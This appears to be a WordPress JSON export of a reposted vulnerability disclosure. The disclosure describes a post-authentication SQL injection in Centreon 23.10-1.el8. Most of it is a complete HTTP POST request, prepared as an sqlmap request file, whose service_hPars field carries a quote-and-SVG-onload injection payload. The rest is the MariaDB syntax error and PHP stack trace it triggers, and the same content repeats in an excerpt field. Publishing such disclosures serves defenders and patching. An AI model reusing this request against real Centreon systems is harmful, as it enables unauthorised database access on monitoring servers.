;; Postauth SQL Injection in Centreon 23.10-1.el8
;; by code610
;;
;; found : 05.03.2024
;; version: centreon-vbox-vm-23_10-1.el8.zip
;; details: https:\/\/code610.blogspot.com\/2024\/04\/postauth-sqli-in-centreon-2310-1el8.html
;; <\/p>\n
;; sqlmap request.txt<\/p>\n
POST \/centreon\/main.get.php?p=60201 HTTP\/1.1
Host: 192.168.56.156
User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko\/20100101 Firefox\/121.0
Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application\/x-www-form-urlencoded
Content-Length: 2529
Origin: http:\/\/192.168.56.156
Connection: keep-alive
Referer: http:\/\/192.168.56.156\/centreon\/main.get.php?p=60201&o=a
Cookie: PHPSESSID=dvipe1o0so6gcg52gkgcrg2avh
Upgrade-Insecure-Requests: 1<\/p>\n
service_description=2222222222xxxxxxxx22&service_hPars%5B%5D=’%3e%22%3e%3csvg%2fonload%3dprompt(123)%3e&service_template_model_stm_id=83&command_command_id=134¯oInput%5B0%5D=MODE¯oValue%5B0%5D=connection-time¯oFrom%5B0%5D=fromTpl¯oTplValue_0=connection-time¯oOriginalName_0=¯oTplValToDisplay_0=1¯oDescription_0=¯oTpl_0=Service+template+%3A+App-DB-MySQL-Connection-Time¯oOldValue_0=connection-time&isFrozen_0=0&clone_order_macro_0=¯oInput%5B1%5D=WARNING¯oValue%5B1%5D=1000¯oFrom%5B1%5D=fromTpl¯oTplValue_1=1000¯oOriginalName_1=¯oTplValToDisplay_1=1¯oDescription_1=¯oTpl_1=Service+template+%3A+App-DB-MySQL-Connection-Time¯oOldValue_1=1000&isFrozen_1=0&clone_order_macro_1=¯oInput%5B2%5D=CRITICAL¯oValue%5B2%5D=5000¯oFrom%5B2%5D=fromTpl¯oTplValue_2=5000¯oOriginalName_2=¯oTplValToDisplay_2=1¯oDescription_2=¯oTpl_2=Service+template+%3A+App-DB-MySQL-Connection-Time¯oOldValue_2=5000&isFrozen_2=0&clone_order_macro_2=&timeperiod_tp_id=1&service_max_check_attempts=&service_normal_check_interval=&service_retry_check_interval=&service_active_checks_enabled%5Bservice_active_checks_enabled%5D=2&service_passive_checks_enabled%5Bservice_passive_checks_enabled%5D=2&service_is_volatile%5Bservice_is_volatile%5D=2&service_notifications_enabled%5Bservice_notifications_enabled%5D=2&service_use_only_contacts_from_host%5Bservice_use_only_contacts_from_host%5D=0&service_notification_interval=&timeperiod_tp_id2=&service_first_notification_delay=&service_recovery_notification_delay=&service_obsess_over_service%5Bservice_obsess_over_service%5D=2&service_acknowledgement_timeout=&service_check_freshness%5Bservice_check_freshness%5D=2&service_freshness_threshold=&service_flap_detection_enabled%5Bservice_flap_detection_enabled%5D=2&service_low_flap_threshold=&service_high_flap_threshold=&service_retain_status_information%5Bservice_retain_status_information%5D=2&service_retain_nonstatus_information%5Bservice_retain_nonstatus_information%5D=2&service_event_handler_enabled%5Bservice_event_handler_enabled%5D=2&command_command_id2=&command_command_id_arg2=&graph_id=&esi_notes_url=&esi_notes=&esi_action_url=&esi_icon_image=&esi_icon_image_alt=&criticality_id=&geo_coords=&service_activate%5Bservice_activate%5D=1&service_comment=&submitA=Save¯oFrom%5B%23index%23%5D=direct&service_id=&service_register=1&p=60201&o=a&initialValues=a%3A0%3A%7B%7D&select=&argChecker=1&macChecker=1¢reon_token=0e87a8f24318f5221765b62c09cb10bf<\/p>\n
;; — <\/p>\n
;; init response:<\/p>\n
<a href=”main.php?p=60201″
class=”pathWay”>Services by host<\/a>
<\/div>
SQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not defined<br \/>
<b>Fatal error<\/b>: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘”><svg\/onload=prompt(123)>’ AND hsr.service_service_id = service_id AND servi…’ at line 1 in \/usr\/share\/centreon\/www\/class\/centreonDB.class.php:311
Stack trace:
#0 \/usr\/share\/centreon\/www\/class\/centreonDB.class.php(311): PDO->query()
#1 \/usr\/share\/centreon\/www\/include\/configuration\/configObject\/service\/DB-Func.php(281): CentreonDB->query()
#2 \/usr\/share\/centreon\/vendor\/openpsa\/quickform\/lib\/HTML\/QuickForm\/Rule\/Callback.php(57): testServiceExistence()
#3 \/usr\/share\/centreon\/vendor\/openpsa\/quickform\/lib\/HTML\/QuickForm\/RuleRegistry.php(130): HTML_QuickForm_Rule_Callback->validate()
#4 \/usr\/share\/centreon\/vendor\/openpsa\/quickform\/lib\/HTML\/QuickForm.php(1315): HTML_QuickForm_RuleRegistry->validate()
#5 \/usr\/share\/centreon\/www\/include\/configuration\/configObject\/service\/formService.php(1156): HTML_QuickForm->validate()
#6 \/usr\/share\/centreon\/www\/include\/configuration\/configObject\/service\/serviceByHost.php(127): require_once(‘…’)
#7 \/usr\/share\/centreon\/www\/main.get.php(304): include_once(‘…’)
#8 {main}
thrown in <b>\/usr\/share\/centreon\/www\/class\/centreonDB.class.php<\/b> on line <b>311<\/b><br \/><\/p>\n
;; — <\/p>\n
;; More:
;; https:\/\/code610.blogspot.com
;; https:\/\/twitter.com\/CodySixteen
;;
;; cheers
;; <\/p>\n","protected":false},"excerpt":{"rendered":"
;; Postauth SQL Injection in Centreon 23.10-1.el8;; by code610;; ;; found : 05.03.2024;; version: centreon-vbox-vm-23_10-1.el8.zip;; details: https:\/\/code610.blogspot.com\/2024\/04\/postauth-sqli-in-centreon-2310-1el8.html;; ;; sqlmap request.txt POST \/centreon\/main.get.php?p=60201 HTTP\/1.1Host: 192.168.56.156User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko\/20100101 Firefox\/121.0Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application\/x-www-form-urlencodedContent-Length: 2529Origin: http:\/\/192.168.56.156Connection: keep-aliveReferer: http:\/\/192.168.56.156\/centreon\/main.get.php?p=60201&o=aCookie: PHPSESSID=dvipe1o0so6gcg52gkgcrg2avhUpgrade-Insecure-Requests: 1 service_description=2222222222xxxxxxxx22&service_hPars%5B%5D=’%3e%22%3e%3csvg%2fonload%3dprompt(123)%3e&service_template_model_stm_id=83&command_command_id=134¯oInput%5B0%5D=MODE¯oValue%5B0%5D=connection-time¯oFrom%5B0%5D=fromTpl¯oTplValue_0=connection-time¯oOriginalName_0=¯oTplValToDisplay_0=1¯oDescription_0=¯oTpl_0=Service+template+%3A+App-DB-MySQL-Connection-Time¯oOldValue_0=connection-time&isFrozen_0=0&clone_order_macro_0=¯oInput%5B1%5D=WARNING¯oValue%5B1%5D=1000¯oFrom%5B1%5D=fromTpl¯oTplValue_1=1000¯oOriginalName_1=¯oTplValToDisplay_1=1¯oDescription_1=¯oTpl_1=Service+template+%3A+App-DB-MySQL-Connection-Time¯oOldValue_1=1000&isFrozen_1=0&clone_order_macro_1=¯oInput%5B2%5D=CRITICAL¯oValue%5B2%5D=5000¯oFrom%5B2%5D=fromTpl¯oTplValue_2=5000¯oOriginalName_2=¯oTplValToDisplay_2=1¯oDescription_2=¯oTpl_2=Service+template+%3A+App-DB-MySQL-Connection-Time¯oOldValue_2=5000&isFrozen_2=0&clone_order_macro_2=&timeperiod_tp_id=1&service_max_check_attempts=&service_normal_check_interval=&service_retry_check_interval=&service_active_checks_enabled%5Bservice_active_checks_enabled%5D=2&service_passive_checks_enabled%5Bservice_passive_checks_enabled%5D=2&service_is_volatile%5Bservice_is_volatile%5D=2&service_notifications_enabled%5Bservice_notifications_enabled%5D=2&service_use_only_contacts_from_host%5Bservice_use_only_contacts_from_host%5D=0&service_notification_interval=&timeperiod_tp_id2=&service_first_notification_delay=&service_recovery_notification_delay=&service_obsess_over_service%5Bservice_obsess_over_service%5D=2&service_acknowledgement_timeout=&service_check_freshness%5Bservice_check_freshness%5D=2&service_freshness_threshold=&service_flap_detection_enabled%5Bservice_flap_detection_enabled%5D=2&service_low_flap_threshold=&service_high_flap_threshold=&service_retain_status_information%5Bservice_retain_status_information%5D=2&service_retain_nonstatus_information%5Bservice_retain_nonstatus_information%5D=2&service_event_handler_enabled%5Bservice_event_handler_enabled%5D=2&command_command_id2=&command_command_id_arg2=&graph_id=&esi_notes_url=&esi_notes=&esi_action_url=&esi_icon_image=&esi_icon_image_alt=&criticality_id=&geo_coords=&service_activate%5Bservice_activate%5D=1&service_comment=&submitA=Save¯oFrom%5B%23index%23%5D=direct&service_id=&service_register=1&p=60201&o=a&initialValues=a%3A0%3A%7B%7D&select=&argChecker=1&macChecker=1¢reon_token=0e87a8f24318f5221765b62c09cb10bf ;; — ;; init response: <a href=”main.php?p=60201″class=”pathWay”>Services by host<\/a><\/div>SQLSTATE[HY093]: …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56291","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56291","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56291"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56291\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56291"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56291"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56291"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}